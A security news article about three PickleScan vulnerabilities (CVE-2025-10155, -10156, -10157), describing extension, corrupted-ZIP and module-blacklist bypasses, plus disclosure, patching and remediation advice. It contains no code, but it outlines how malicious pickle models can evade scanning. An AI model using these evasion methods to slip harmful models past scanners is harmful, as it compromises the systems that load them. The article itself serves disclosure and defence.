A recent in-depth security analysis has uncovered a trio of critical vulnerabilities within PickleScan, a widely-adopted tool for securing Python pickle files and PyTorch models, casting a shadow over the integrity of the AI supply chain. With the rapid integration of machine learning models into critical infrastructure, the security of the components that build and vet these models has become paramount. These newly discovered flaws, all carrying a high-severity CVSS score of 9.3, reveal a dangerous gap between security validation and real-world application, a gap that malicious actors can exploit to inject harmful code into AI systems. The vulnerabilities highlight how an attacker could bypass the very tool designed to prevent such intrusions, allowing them to distribute compromised models that appear safe to the scanner but are capable of executing arbitrary commands. This situation underscores a pressing challenge in the AI security landscape: ensuring that the tools used to protect the ecosystem are not themselves a weak link in the chain. The findings serve as a stark reminder that even with sophisticated defenses, subtle discrepancies in file processing can create significant security blind spots.
A Chasm Between Scanning and Execution
The core of the identified vulnerabilities lies in a fundamental and perilous discrepancy between how PickleScan inspects a file and how a machine learning framework like PyTorch ultimately processes it. This divergence creates exploitable blind spots. The first vulnerability, designated CVE-2025-10155, revolves around a simple file extension bypass. An attacker can craft a malicious pickle file and disguise it with a common PyTorch extension, such as .bin or .pt. PickleScan, prioritizing the file extension over the actual content, misinterprets the file’s nature and fails the scan, effectively giving it a pass. However, PyTorch is not so easily fooled; it loads the file based on its content, executing the hidden malicious payload without warning. Another critical flaw, CVE-2025-10156, exploits differing behaviors in handling corrupted ZIP archives. When PickleScan encounters a CRC mismatch, a sign of data corruption, it aborts the scan. In contrast, PyTorch is designed to ignore these errors and proceeds to load the model. This allows an attacker to deliberately corrupt an archive containing a malicious model, ensuring it evades the scanner while remaining fully functional for the ML framework, a perfect storm for a stealthy attack.
Patching the Gaps in AI Security
The third vulnerability, CVE-2025-10157, demonstrated a clever method for evading the tool’s built-in defenses by circumventing its module blacklist. Instead of directly calling a flagged, dangerous module, an attacker could reference a subclass of that module. This subtle redirection was enough to trick PickleScan into downgrading the threat level from “Dangerous” to merely “Suspicious,” a classification unlikely to trigger a critical alert, thereby allowing arbitrary commands to execute during deserialization. Following the private disclosure of these issues on June 29, 2025, a patch was released on September 2, 2025, which addressed these critical flaws. The recommended immediate remediation was to update PickleScan to version 0.0.31. However, the incident brought to light systemic risks that extend beyond a single tool. It underscored the dangers of over-relying on one scanner and highlighted the urgent need for a layered, defense-in-depth security posture for the entire AI supply chain. The long-term solution promoted by security experts involved migrating away from the inherently insecure pickle format toward safer alternatives like Safetensors, which are designed to prevent arbitrary code execution by design.

